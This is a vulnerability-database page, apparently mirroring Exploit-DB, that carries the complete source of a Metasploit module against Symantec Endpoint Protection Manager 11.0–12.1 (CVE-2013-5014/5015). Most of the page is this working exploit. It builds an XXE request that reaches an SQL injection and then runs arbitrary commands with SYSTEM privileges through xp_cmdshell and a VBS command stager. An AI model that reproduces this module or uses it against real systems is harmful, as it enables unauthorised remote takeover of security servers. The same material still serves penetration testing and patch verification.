Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)

🗓️ 26 Feb 2014 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 52 Views

Symantec Endpoint Protection Manager XXE and SQL injection flaws allows remote command execution with SYSTEM privileges via xp_cmdshell

Code
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
      'Description'    => %q{
        This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
        versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
        can reach SQL injection affected components. As xp_cmdshell is enabled in the included
        database instance, it's possible to execute arbitrary system commands on the remote system
        with SYSTEM privileges.
      },
      'Author'         =>
        [
          'Stefan Viehbock', # Discovery
          'Chris Graham', # PoC exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-5014' ],
          [ 'CVE', '2013-5015' ],
          [ 'EDB', '31853'],
          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows VBS Stager', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 24 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(9090),
        OptString.new('TARGETURI', [true, 'The base path', '/'])
      ], self.class)
  end

  def check
    res = send_request_cgi(
      {
        'uri'   =>  normalize_uri(target_uri.path),
        'method' => 'GET',
      })

    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Sending payload")
    # Execute the cmdstager, max length of the commands is ~3950
    execute_cmdstager({:linemax => 3950})
  end

  def execute_command(cmd, opts = {})
    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"

    # Generate random 'xx032xxxx' sequence number.
    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"

    soap = soap_request(seqnum, command)

    post_data = Rex::MIME::Message.new
    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
    xxe = post_data.to_s

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
        'method' => 'POST',
        'vars_get' => { 'ActionType' => 'ConsoleLog' },
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
        'data' => xxe,
      })

    if res and res.body !~ /ResponseCode/
      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
    end
  end

  def soap_request(seqnum, command)
    randpayload = rand_text_alpha(8+rand(8))
    randxxe = rand_text_alpha(8+rand(8))
    entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
    entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"

    xml = Document.new
    xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
    xml.add_element("Request")
    xxe = xml.root.add_element(randxxe)
    xxe.text = "PAYLOAD"

    xml_s = xml.to_s
    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
    xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding

    xml_s
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2014 00:00Current
7.4High risk
Vulners AI Score7.4
xxesql injectionremote command executionsystem privilegesxp_cmdshellcve-2013-5014cve-2013-5015symantec endpoint protection manager
52